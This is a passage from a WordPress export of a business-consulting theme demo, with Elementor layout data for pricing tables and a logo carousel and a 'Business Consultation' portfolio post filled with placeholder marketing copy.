Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"a5e277a","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4f90658","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 89","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"e676d1e","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"yearly","layout":"full_width"},"elements":[{"id":"9729d97","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"194320d","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"88ccea0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"148d950","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"d27a889","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"4fc8771","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"5ef0e76","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"789c4a0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b5a1c52","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":583},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":584},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":585},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":586},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":587},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":588},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2025]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:19;s:19:"_inline_size_tablet";i:12;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:6:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:28:"stitle_typography_typography";i:2;s:27:"stitle_typography_font_size";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:5;s:16:"content_position";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;s:11:"css_classes";i:2;}}s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:2;s:16:"background_image";i:2;s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:1:{s:5:"title";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:4:{s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"text";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iswitcher";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"title_left";i:1;s:11:"title_right";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:2:{s:11:"title_color";i:1;s:9:"toggle_bg";i:1;}}}}s:13:"ipricingtable";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"title";i:6;s:5:"price";i:6;s:9:"price_for";i:6;s:7:"details";i:6;s:11:"is_featured";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:4;}}s:5:"style";a:1:{s:21:"style_content_section";a:2:{s:27:"price_typography_typography";i:6;s:28:"price_typography_font_family";i:6;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:3:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consultation</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-consultation/</link>
		<pubDate>Fri, 11 Sep 2020 07:26:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=773</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>773</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:26:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:26:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consultation]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3eb71c6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"40279fc","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"f75ccb2","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3fdd108","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"31adc79","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"a1676c3","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"925bd17","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"98d8bcd","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4516c47","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3b7b92a","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c389ea2","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"86fc555","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2bed14d","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f07866b","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"14874f9","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"03b8867","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"47f5968","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"edf6855","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"e78cad3","elType":"section","settings":[],"elements":[{"id":"e8d6e5b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"15404a3","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"b74e069","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1caaed7","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"52e8c3f","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"7d28b26","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"53322cf","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"52d81cf","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"71dad4e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"8fe0535","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"026d7df","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"585151a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"d4cf011","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"b2a5fc7","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"ed0ac51","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6d7d4e6","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"72aba5e","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"a826fb6","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9123a49","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"2108e83","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"30431b0","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"23151a6","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"00b6742","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"7bbec8b","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab 